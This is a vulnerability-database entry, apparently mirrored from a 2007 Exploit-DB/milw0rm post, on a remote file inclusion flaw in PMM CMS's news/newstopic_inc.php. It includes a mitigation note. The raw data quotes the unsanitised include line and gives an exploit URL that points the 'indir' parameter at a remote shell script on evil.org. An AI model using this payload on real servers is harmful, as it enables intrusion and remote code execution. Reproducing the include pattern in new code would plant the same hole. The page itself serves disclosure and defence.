header-logo
Suggest Exploit
vendor:
PMM CMS
by:
0in
7.5
CVSS
HIGH
Remote Code Execution
Not provided
CWE
Product Name: PMM CMS
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

Remote Code Execution in PMM CMS

The vulnerability exists in the 'news/newstopic_inc.php' file of the PMM CMS. The script does not properly validate user-supplied input before including a file. An attacker can exploit this vulnerability by sending a crafted request with a malicious URL in the 'indir' parameter, leading to remote code execution on the server.

Mitigation:

It is recommended to update PMM CMS to the latest version to mitigate this vulnerability. Additionally, proper input validation should be implemented in the affected script.
Source

Exploit-DB raw data:

#f0und bY 0in
#Download:http://pmm-cms.sourceforge.net/
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";

Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt

# milw0rm.com [2007-09-28]

Navigation

Suggest Exploit

Services By CQR